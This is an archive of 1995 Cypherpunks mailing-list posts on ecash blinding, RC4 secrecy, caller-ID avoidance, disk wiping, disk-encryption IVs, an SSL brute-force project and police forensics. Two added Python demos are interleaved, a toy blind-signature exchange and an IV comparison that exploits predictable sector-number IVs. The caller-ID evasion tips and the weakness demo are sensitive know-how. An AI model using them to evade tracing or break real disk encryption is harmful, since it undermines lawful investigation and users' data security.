advance and there is no way to force different blinding under duress.  I
posted more detail on this to the list sometime last year but I don't
remember when unfortunately.

Note of course that this whole traceability business only works if you
have to identify yourself to the bank whenever you deposit the money.  If
someone allows anonymous banknote exchange then the whole "advantage"
goes out the window.  IMO payee anonymity will be a desired feature of
ecash systems and I think Chaum is making a mistake claiming that it will
not or should not exist.

Another quibble is that blackmail is not a good example.  The payor
doesn't want to blow the whistle on his blackmailer; the blackmailer is
doing the payor a favor by giving him the option of paying money rather
than having the damaging information revealed.  Often the payor will know
who the blackmailer is.

Hal
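
The nested blinding exchange discussed in the message above, worked through with RSA blind signatures as an added example (not code from the post or from any ecash product). It shows that what the bank signs is indistinguishable from an ordinary single-blinded withdrawal, which is why the counter-measures have to sit outside the signing step. The toy bank key, the function names and the serial number are constructed assumptions.

```python
import hashlib
import math
import secrets

# Constructed toy RSA key for the bank, built from two Mersenne primes.
# Far too small for real use; chosen only so the arithmetic is easy to follow.
P, Q = 2**31 - 1, 2**61 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # bank's private exponent


def coin_hash(serial: bytes) -> int:
    """Map a coin serial number to the integer the bank's signature covers."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def random_blinding_factor() -> int:
    """Pick r with gcd(r, N) = 1 so that r is invertible modulo N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            return r


def blind(x: int, r: int) -> int:
    return x * pow(r, E, N) % N          # x * r^e mod N


def unblind(s: int, r: int) -> int:
    return s * pow(r, -1, N) % N         # s * r^-1 mod N


def bank_sign(x: int) -> int:
    return pow(x, D, N)                  # the bank signs whatever it is sent


def verify(m: int, s: int) -> bool:
    return pow(s, E, N) == m


def nested_withdrawal(serial: bytes) -> dict:
    """Run the payee -> payer -> bank -> payer -> payee exchange."""
    m = coin_hash(serial)
    r_payee = random_blinding_factor()
    r_payer = random_blinding_factor()

    to_payer = blind(m, r_payee)          # payee blinds the serial hash
    to_bank = blind(to_payer, r_payer)    # payer blinds it again
    signed = bank_sign(to_bank)           # bank signs the doubly blinded value
    to_payee = unblind(signed, r_payer)   # payer removes their factor
    coin_sig = unblind(to_payee, r_payee) # payee removes theirs

    return {
        # The final signature is a valid bank signature on the coin.
        "valid": verify(m, coin_sig),
        # The bank never saw the value it will later be shown at deposit.
        "bank_saw_coin": to_bank == m,
        # Two blinding factors collapse into one: the bank's input is exactly
        # what a single blinding with r_payee * r_payer would have produced.
        "same_as_single_blinding": to_bank == blind(m, r_payee * r_payer % N),
    }


if __name__ == "__main__":
    for name, value in nested_withdrawal(b"constructed serial 0001").items():
        print(f"{name}: {value}")
```
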




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 27 Jul 95 06:50:36 PDT
To: cypherpunks@toad.com
Subject: Re: Full text of David Chaum's Congressional speech
In-Reply-To: <199507271307.PAA21979@digicash.com>
Message-ID: <9507271344.AA17685@all.net>
MIME-Version: 1.0
Content-Type: text


A few minor comments on David Chaum's testimony before congress:

...
> As an American who is regarded as the inventor of electronic cash,
> who has worked over the last dozen or so years to make the technology
> viable, and who is now CEO of a leading company pioneering in its
> commercialization, I am very pleased by the interest being shown
> here and to be here today. 

The inventor of electronic cash is Mr.  William S.  Powell, who holds
the patent on the electronic cashwatch and whose patent has been stomped
on by numerous and various others because he doesn't have the money to
defend it.  David Chaum's published work was more than 7 years later
than the issue date of the Powell patent.

...
> it will be the responsibility of government to protect against
> systemic risk.  This is a serious role that cannot be left to the
> micro-economic interests of commercial organizations.

David's technology notwithstanding, the only way the government can do
this is by eliminating the anonymity associated with cash in favor of a
fully audited system in which all of the transactions are known to the
government.  This is fundamentally at odds with the goal of privacy. 

> In order for those in government to make informed decisions, it will
> be necessary for them to understand the basic ways to secure
> transactions in different situations.

It is unlikely that their decisions will be based on their understanding
of technology - it better not be, since they don't understand it. 

> One basic form is tamper-resistance, exemplified by the chip in a
> chip card.  It is designed to be hard to modify or to read secrets
> from. Such tamper-resistance is needed for "off-line"
> payments--those in which the reader device receiving payment from a
> card, validates payments by contacting a central system only at the
> end of each day.

The current technology costs about $500 per chip-card to read and
recreate.  No current purely electronic technology is capable of being
used for a larger value than that under any scheme feasible for
electronic money.

> (Incidentally, this and the other basic form must rely for security
> on cryptography, sometimes referred to as encryption, which is
> fundamental to all information security.) 

This is not true.  The vast majority of effective current technology in
information security is not tied to cryptography.

...

The testimony goes on and on, but I'll give up here for now.

---
-> See:  Info-Sec Heaven using our New Super Secure World-Wide-Web Server
-> Free: Test your system's security (scans deeper than SATAN or ISS!)
---------------------- both at URL: http://all.net ----------------------
-> Read: "Protection and Security on the Information Superhighway"
	 John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95
-------------------------------------------------------------------------
   Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Date: Thu, 27 Jul 95 00:55:23 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: Re: RC4
Message-ID: <9507270754.AA04474@sirius.wi.WHU-Koblenz.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

>I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
>copyright.  Intellectual property means secret, right?  Aren't there any
>precedence cases involving propriety schemes that are reverse engineered?

Game cartridges (I think Sega was involved)

  Wolfgang
---
Dipl.-Wirtsch.-Inf.	Voice:	+49 261 6509 173
Wolfgang Roeckelein	Fax:	+49 261 6509 179
WHU Koblenz		E-Mail:	roeckelein@wi.whu-koblenz.de
Burgplatz 2			(NeXTmail ok)
D-56179 Vallendar	WWW:	http://www.whu-koblenz.de/~wolfgang/
Germany
--rsa--------------------------------8<-------------------------------------
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-------------------------------------8<-------------------------------------
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
Residents of the USA & France *MUST NOT* include this .sig if following up!
*** Residents of France & Russia *MUST NOT* make any use of this -sig !  ***




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 27 Jul 95 07:44:23 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Banks and Crypto
Message-ID: <199507271401.KAA10983@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 PM 7/26/95 -0400, Robert A. Rosenberg wrote:

>Is there ANY reason why you did not just paste the text of this file into
>your message? Also, if you are going to attach files in lieu of writing
>messages, it might be useful to mention what word processor was used to
>create the file so it can be read. In this case, what format is your file
>in?

My copy of that inferior word processor Word for Windows 6.0 tells me it is
Wordperfect for DOS 5.1.


DCF

"The Market is X the Unknown, The Blob, and Blue Goo."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 27 Jul 95 07:17:23 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: "Only on the Cypherpunks list..."
In-Reply-To: <ac3af6120f021004a990@[205.199.118.202]>
Message-ID: <Pine.BSD/.3.91.950727100633.28384B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Jul 1995, Timothy C. May wrote:

> (Smileys for the :=)-impaired...I have nothing against Linux, and even
> browsed the new O'Reilly book recently. But I'm _still_ glad I'm "just a
> Mac user.")

Well you know there is a Mac version of Linux -- not sure if it's 
available for PPC yet.  there also is/was a version of FreeBSD a while 
back too.  (Don't know any details as I haven't done this myself yet.)

You could just add another hard drive and run Linux off of it, or install 
it on a SyQuest cartridge and set the startup disk to point to your 
SyQuest drive.  If you want Linux, start up with the cart.  If you don't, 
startup without it, or with the drive off.

Then you can have the best of both. >;-)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 27 Jul 95 07:25:26 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: CALLER ID AVOIDANCE (fwd)
Message-ID: <Pine.BSD/.3.91.950727101631.28384E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Tue, 25 Jul 1995 23:19:13 -0400
From: Sal Denaro <Sal@panix.com>
To: sunder@escape.com
Newgroups: alt.cypher-punks
Subject: Re: CALLER ID AVOIDANCE (fwd)

<<<<<< INTERJECTION: I didn't write the message Sal's replying to, Sandy 
did.  Sal's on my 'filtered' cypherpunx list. :-) -- Ray. >>>>>>>

In article <Pine.BSD/.3.91.950724140311.25983F-100000@escape.com>,
Ray Arachelian <sunder@escape.com> kept the nurses distracted long
  enough to write:
>                           SANDY SANDFORT
> C'punks,
> 
> While reading the July issue of Soldier of Fortune, I ran across
> an ad for yet another telephone anonymity service.  It reads:
> 
> 			CALL 1-900-CUT TRAX
>
> 	Secure your most sensitive calls from all forms of
> 	caller I.D. and return-call technologies?
> 
> 	Now make calls from your own telephone safely and
> 	anonymously.  No need to find a public phone to
> 	be discreet.
> 

If they are a Licensed Interchange Carrier they must (by law) provide
call records and caller id information on court order. If they fail to
answer the court order they could lose the right to operate as a LIC.
If they are not a fully licensed carrier, they can have all equipment 
impounded if they do not honor the court order. Ask anyone who knows 
telco-law. 

Let's say you call someone with call-id and do something silly like
tell them "I'm going to kill you and your boyfriend, leave my bloody
glove at the scene and drive away in my white ford bronco." 

This scares them. The person calls the cops. 

The cops call the number on caller id. They track down the service and
tell the service- "Give up the call records or get closed down."

What do you think the carrier will do?

I say this all the time, if you want privacy- Don't use the phone.

Here are some things I've heard: (Not responsible for blah blah...)

1) Most caller ID equipment will not display Caller ID from calls 
 made at ISDN phones. 

2) Most digital cell-phones have the same quirk.

3) Call-id does not work when calls are made from digital PBXs in 
 Japan.

4) Call-id does not work when calls are made from digital PBXs in most 
 parts of east-block Europe.

5) This happens only in Nynex land and will be fixed by 1997. (yes, 1997)

--
Salvatore Denaro		
sal@panix.com             I waited for the joke/It never did arrive.
Yes, I use PGP         Words I thought I'd choke/I hardly recognize.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joee@li.net (j. ercole)
Date: Thu, 27 Jul 95 07:26:09 PDT
To: cypherpunks@toad.com
Subject: mac share/freeware app for overwriting unused hd space?
Message-ID: <v01510100ac3d51f81e95@[199.173.75.102]>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone point me towards a program that's freeware or shareware that
will overwrite all the unused i.e., "trashed" space on my hard drive(s)?  I
sincerely apologise if this is a faq.  I know norton's will do it but I
don't presently have that installed on my machine.  Thanks oodles,
joe


j. ercole
ny, usa
vox: 516.681.3548
e-mail: joee@li.net
finger for pgp public key







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 27 Jul 95 02:44:49 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypting block driver for Linux...need some advice
In-Reply-To: <Pine.LNX.3.91.950726091131.129A-100000@comet.aeinet.com>
Message-ID: <Pine.SOL.3.91.950727104038.17605B-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jul 1995, Johnathan Corgan wrote:
 
> Another, more crypto related question--how to deal with IV's?  Right now,
> I'm using 512 byte sectors with CBC.  For each sector, the IV is the
> sector number.  This frustrates the known plaintext attack issue, but I'm
> not sure if such a simple scheme is really effective.  Probably not.

Your scheme should be OK.  If you'd chosen the same IV for each sector 
then identical sectors would encrypt the same.  If I remember rightly 
then having a known IV only affects the security of the first block, 
after that the ciphertext chaining comes into effect.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+
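
The three IV choices raised in this thread (one IV for every sector, Johnathan Corgan's sector number as IV, and Tatu Ylonen's MD5 of the block number combined with secret data) compared side by side in an added example that is not code from any poster or from the driver. The 64-bit Feistel cipher is a constructed stand-in for DES, and the function names, key, IV secret and sector contents are assumptions made for the demonstration.

```python
import hashlib
import hmac

BLOCK = 8      # 64-bit cipher block, as with DES
SECTOR = 512   # sector size used in the thread


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_block(key: bytes, block: bytes) -> bytes:
    """Toy 8-round Feistel permutation standing in for DES. Not a real cipher."""
    left, right = block[:4], block[4:]
    for rnd in range(8):
        f = hmac.new(key, bytes([rnd]) + right, hashlib.sha256).digest()[:4]
        left, right = right, xor(left, f)
    return left + right


def cbc_encrypt_sector(key: bytes, iv: bytes, sector: bytes) -> bytes:
    """CBC over one sector: each block is XORed with the previous ciphertext."""
    if len(iv) != BLOCK or len(sector) != SECTOR:
        raise ValueError("need an 8-byte IV and a 512-byte sector")
    prev, out = iv, bytearray()
    for off in range(0, SECTOR, BLOCK):
        prev = encrypt_block(key, xor(prev, sector[off:off + BLOCK]))
        out += prev
    return bytes(out)


# --- IV policies -----------------------------------------------------------
def iv_fixed(sector_no: int) -> bytes:
    return bytes(BLOCK)                       # same IV for every sector


def iv_sector_number(sector_no: int) -> bytes:
    return sector_no.to_bytes(BLOCK, "big")   # public and predictable


def make_iv_keyed_md5(iv_secret: bytes):
    """IV = MD5(secret || sector number), truncated to one cipher block."""
    def iv(sector_no: int) -> bytes:
        material = iv_secret + sector_no.to_bytes(BLOCK, "big")
        return hashlib.md5(material).digest()[:BLOCK]
    return iv


# --- what someone holding only the ciphertext can observe ------------------
def identical_sectors_leak(key: bytes, iv_fn) -> bool:
    """Do two sectors with identical plaintext give identical ciphertext?"""
    data = b"\x00" * SECTOR                   # constructed sample sector
    return (cbc_encrypt_sector(key, iv_fn(10), data)
            == cbc_encrypt_sector(key, iv_fn(11), data))


def crafted_sectors_leak(key: bytes, iv_fn) -> bool:
    """Two sectors whose first blocks differ by exactly the XOR of their
    sector numbers. If the IV is the bare sector number, the XOR with the IV
    cancels that difference, the cipher sees the same first input, and the
    ciphertexts match: stored data can be recognised without the key."""
    base = b"CONSTRUC"                        # constructed 8-byte marker
    tail = b"T" * (SECTOR - BLOCK)
    p10 = xor(base, iv_sector_number(10)) + tail
    p11 = xor(base, iv_sector_number(11)) + tail
    return (cbc_encrypt_sector(key, iv_fn(10), p10)
            == cbc_encrypt_sector(key, iv_fn(11), p11))


if __name__ == "__main__":
    key = b"constructed demo key"
    policies = {
        "fixed IV": iv_fixed,
        "sector number": iv_sector_number,
        "MD5(secret, sector)": make_iv_keyed_md5(b"constructed iv secret"),
    }
    for name, fn in policies.items():
        print(f"{name:22} identical sectors match: "
              f"{identical_sectors_leak(key, fn)!s:5}  "
              f"crafted sectors match: {crafted_sectors_leak(key, fn)}")
```
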




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 27 Jul 95 07:48:03 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: "Only on the Cypherpunks list..."
In-Reply-To: <Pine.BSD/.3.91.950727100633.28384B-100000@escape.com>
Message-ID: <9507271447.AA12988@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Arachelian writes:
> Well you know there is a Mac version of Linux -- not sure if it's 
> available for PPC yet.  there also is/was a version of FreeBSD a while 
> back too.  (Don't know any details as I haven't done this myself yet.)

NetBSD, not FreeBSD. There is also MachTen.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 27 Jul 95 07:56:13 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: "Only on the Cypherpunks list..."
In-Reply-To: <9507271447.AA12988@snark.imsi.com>
Message-ID: <Pine.BSD/.3.91.950727104607.2847B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jul 1995, Perry E. Metzger wrote:

> Ray Arachelian writes:
> > Well you know there is a Mac version of Linux -- not sure if it's 
> > available for PPC yet.  there also is/was a version of FreeBSD a while 
> > back too.  (Don't know any details as I haven't done this myself yet.)
> 
> NetBSD, not FreeBSD. There is also MachTen.

Thanks. :-)  MachTen though isn't freeware as Linux is. :-)  The problem 
I have with it is that it's a hosted OS and as such is limited to the 
Mac's problems.  i.e. - lack of true preemptive multi-tasking and 
protected memory.  Though the M680x0 series and all Mac motherboards can 
support both preemption and protected memory, Apple in its grand wisdom 
(or lack thereof?) is only now writing it into the next version of its OS.

Other than that I love the Mac. :-)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: E.J.Koops@kub.nl
Date: Thu, 27 Jul 95 01:50:57 PDT
To: cypherpunks@toad.com
Subject: Re: Utah Digital Signatures Act
Message-ID: <MAILQUEUE-101.950727105020.384@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


> From:          "greg pitz" <pitz@onetouch.com>
> Would someone be so kind as to describe the Utah initiative?  I
> wasn't able to find a further description in my percursory search of
> Mr Froomkin's otherwise very informative home page
>
> http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html

You can find the text at (save typing errors :-)):
gopher://gopher.utah.edu:70/77/Off%20Campus%20Information/State%20of%20Utah/Utah%20Legislative%20Bills/1995/Bills/Senate/SB0082

Bert-Jaap

----------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 66 8101
Centre for Law and Informatization      facs    +31 13 66 8102
Tilburg University                      e-mail  E.J.Koops@kub.nl
                               --------------------------------------
Postbus 90153                 |       "We forgot the crackers!"      |
5000 LE Tilburg               |                                      |
The Netherlands               |           Wallace and Gromit         |
---------------------------------------------------------------------
         http://www.kub.nl:2080/FRW/CRI/people/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 27 Jul 95 02:53:29 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge?
In-Reply-To: <9507262108.AA25550@toad.com>
Message-ID: <Pine.SOL.3.91.950727104855.17605C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jul 1995, Peter Trei wrote:

> Where does the effort to bruteforce SSL stand?

[an addition to Piete's follow-up]

We should be ready to get going very soon.  Clients and servers are 
working together and just need a little more testing to make sure they 
are better than perfect :-)

The protocol we're going to use is designed to be highly general and can 
be used to attempt a brute force attack on any crypto algorithm.  More on 
this later, but we've had a few thoughts...


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 27 Jul 95 11:05:16 PDT
To: cypherpunks@toad.com
Subject: Allan Schiffman on SHTTP removing PGP support
Message-ID: <9507271805.AA27155@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I asked Allan, who spoke on S-HTTP at a recent BayFF meeting, about
this.

Date: Tue, 25 Jul 95 20:02:12 PDT
From: ams@eit.COM (Allan M Schiffman)

It's true, the most recent draft of the S-HTTP spec deprecated
(that is, dropped) support for PGP encapsulation.

Eric and I did this because we:
	1) Hadn't implemented PGP support ourselves.
	2) Knew of no other S-HTTP implementation which did (we know of
	   three other S-HTTP implementations).
	3) Were unsatisfied with the formalization of PGP encapsulation
	   format (as opposed to the behavior of a particular program).
	4) Realized that our spec didn't permit implementation given
	   our lack of support for PGP name forms and keying materials.
	   An alternative to dropping PGP would have been to fix this,
	   but we didn't have the time (or the motivation, given 1-3 above).

That doesn't mean "X.509 all the way" for S-HTTP, by a long shot. We
have publicly committed (at the IETF WTS WG last week) to support
MOSS, with all its name forms and keying materials. The next draft of
the spec will detail how to do this, probably emphasizing the use of
new key management mechanisms made possible by Secure DNS.

For what it's worth, I'm no fan of X.509, although I'm on record as a
believer in "multiply-rooted qualified hierarchical trust" (which
presumably classifies me as an "anal hierarchy fan").

-Allan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 27 Jul 95 02:46:00 PDT
To: cypherpunks@toad.com
Subject: Police computer forensics interview
Message-ID: <199507270945.LAA08500@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


There is an article on page 122 of this week's UK PC User (26 July - 22
August) by the head of the technical support unit for Essex Police.
Here's a few choice cuts from the article:

...

Now, what we do is go out on raids, or at least instruct officers on
how to seize computers and bring them back to the computer evidence
lab.  The first thing we do with a computer is to make an exact copy
of the hard disk and any floppies that come with it.  It is essential
that we have an exact image, rather than just a file copy, so we get
everything, like the remaining bits of deleted files.  We can
interrogate the free space and slack space where there could be
important evidence.

To do this we've developed our own imaging system.  This is basically
a bit copier:  it just copies every single bit of a hard disk onto
either an optical drive or a hard drive, and saves it as a long file.
We reconstruct the disk on our own computer, a Vale machine with a
90MHz Pentium processor, and then we can perform the investigation.

...

What we look for depends on the case: if it's a fraudster's machine,
we'll be looking for sets of accounts, if we're dealing with a
paedophile, we're looking at graphic images.  We basically start by
looking for erased material, which is always the most interesting, and
the slack space.

...

One of our biggest problems is getting around passwords and
encryption.  Not the base passwords -- they're easy to get around --
but the passwords on the applications themselves, and encryption can
be very difficult to crack.

We do have special programs to get around them, but you need
individual ones for each application.  The programs can crack most
Microsoft applications in minutes, but some, Paradox for example, are
a lot harder.

The biggest headaches are the pocket organisers from Psion or Sharp.
On a PC you have password protection, but you can always get in
through the motherboard, but with a Psion you can't get in without the
manufacturer's assistance.


Interviewer:  Ken Luxford
Interviewee:  Andrew Johnson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rross@sci.dixie.edu (Russell Ross)
Date: Thu, 27 Jul 95 10:40:39 PDT
To: stopak@orionsci.com (Noam Stopak)
Subject: Re: patented vs secret (was Re: RC4)
Message-ID: <v01520d03ac3d80cdd20a@[144.38.16.209]>
MIME-Version: 1.0
Content-Type: text/plain


>>
>> By the way, since RSA is such a vocal opponent of the Clipper chip on the
>> grounds of its secret Skipjack algorithm, why does it market secret
>> algorithms like RC4 and RC2?  Does this seem like a double face to anyone
>> else?
>>
>> -----------------------------------------------------------
>> Russell Ross                     email: rross@sci.dixie.edu
>> 1260 N 1280 W                    voice: (801)628-8146
>> St. George, UT 84770-4953
>
>Patented does not equal secret.  The argument against Clipper (at least one
>of them ;-), is that it has not been subjected to review outside of the NSA.
>
>I believe the code for RC4 and RC2 is accessible and has been subjected to
>review by many in the crypto field - you just can't use it legally without
>a license.
>
>Noam

Source code for them is available for $25,000, but only binaries are
available otherwise.  The source code for RC4 was leaked or
reverse-engineered, so it is widely known now, but RSA has never released
the algorithm officially.  I have found no documentation on the algorithm
behind RC2.  They are in fact secret, proprietary algorithms, with the
exception of the unofficial RC4 code.

-----------------------------------------------------------
Russell Ross                     email: rross@sci.dixie.edu
1260 N 1280 W                    voice: (801)628-8146
St. George, UT 84770-4953






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 26 Jul 95 22:17:48 PDT
To: perobich@ingr.com
Subject: Re: Netscape the Big Win
In-Reply-To: <199507261447.AA17788@poboy.b17c.ingr.com>
Message-ID: <Pine.LNX.3.91.950727130323.18391A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jul 1995, Paul Robichaux wrote:

> Hal said:
> > This sounds very good if it already is almost working.  The TCP
> > connection which is opened would have to be to a server on the local
> > machine, so it would be important that the software support that.  Also,
> > the local SOCKS relay would of course not want its winsock calls to be
> > intercepted and translated in this way, so there would need to be some
> > alternative way to access "vanilla" winsock.  Can you give any
> > more information on the NEC work?
> 
> This should be fairly straightforward: take the existing winsock.dll
> or winsock32.dll and rename it. Install the NEC DLL with the old
> winsock's name, then have the NEC DLL do a LoadLibrary() to attach the
> original version.

In any case, Trumpet Winsock has got a built-in socksifier, even in the 
non-time-limited version 2.0b. It's activated by the "Firewall setup" 
dialogue box, and seems to work: I've just tested it with a sockd 4.2b 
running on a Linux box. NEC's DLL will add the same functionality to 
other stacks, but experimental encrypting relays could be tested right 
now with Trumpet Winsock.

Think about it, this could be the ultimate encryption hook: I don't think 
that NSA could arrive to ban firewall support...

Now for a catchy name for SOCKS-based encrypting relays: what about 
"SafeSox"? :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stopak@orionsci.com (Noam Stopak)
Date: Thu, 27 Jul 95 10:33:19 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: patented vs secret (was Re: RC4)
In-Reply-To: <v01520d05ac3c5174f88c@[144.38.16.209]>
Message-ID: <9507271733.AA05542@orionsci.com>
MIME-Version: 1.0
Content-Type: text


> 
> By the way, since RSA is such a vocal opponent of the Clipper chip on the
> grounds of its secret Skipjack algorithm, why does it market secret
> algorithms like RC4 and RC2?  Does this seem like a double face to anyone
> else?
> 
> -----------------------------------------------------------
> Russell Ross                     email: rross@sci.dixie.edu
> 1260 N 1280 W                    voice: (801)628-8146
> St. George, UT 84770-4953

Patented does not equal secret.  The argument against Clipper (at least one 
of them ;-), is that it has not been subjected to review outside of the NSA.

I believe the code for RC4 and RC2 is accessible and has been subjected to
review by many in the crypto field - you just can't use it legally without 
a license.

Noam



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Thu, 27 Jul 95 08:09:57 PDT
To: cyberia-l@birds.wm.edu
Subject: International raids on internet "porn ring"
Message-ID: <2816@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Today's Guardian (uk) reports at page 4, column 2:

[I've edited this down]


       "Police move on Internet porn" 
By Owen Bowcott

       Vice squad officers from eight police forces yesterday took
part in an internationally-co-ordinated operation aimed at
suspected paedophiles who are alleged to have been exchanging
child pornography on the Internet.

       Nine people were arrested in early morning raids in the 
United Kingdom and a further 31 were detained elsewhere in her, 
America, the far east and South Africa.

       Codenamed Operation Starburst, the investigation follows 
growing concerns [about internet porn]  ...

       In the United Kingdom, 13 search warrants were executed 
... Computer equipment was seized.  Those arrested were 
questioned but later released on bail.  [later the article 
reports 9 arrests and 17 computers seized] 

       The inquiry was prompted by officers in the West  
Midlands police commercial vice unit who had identified 
several   Britons they believed were distributing child 
pornography on the Internet.  The Paedophile Unit and the 
National Criminal Intelligence Service made contact with 
overseas police forces to trace people suspected of  trading 
obscene pictures.

       [Detectives then quoted describing how "appalling" and 
"hard core" the pictures were, and saying that the "perverts 
were not making profits from the pictures" just trading them.]
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 27 Jul 95 11:31:48 PDT
To: stopak@orionsci.com (Noam Stopak)
Subject: Re: patented vs secret (was Re: RC4)
In-Reply-To: <9507271733.AA05542@orionsci.com>
Message-ID: <199507271830.OAA22564@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I believe the code for RC4 and RC2 is accessible and has been subjected to
| review by many in the crypto field - you just can't use it legally without 
| a license.

	This is not correct.  RC2 is not public; something that
interoperates with RC4 was posted to cypherpunks & sci.crypt last
year.  Neither have undergone any peer review that has been published
(AFAIK).  A paper on RC5 is listed in the Crypto 95 schedule, but
nothing on RC4.

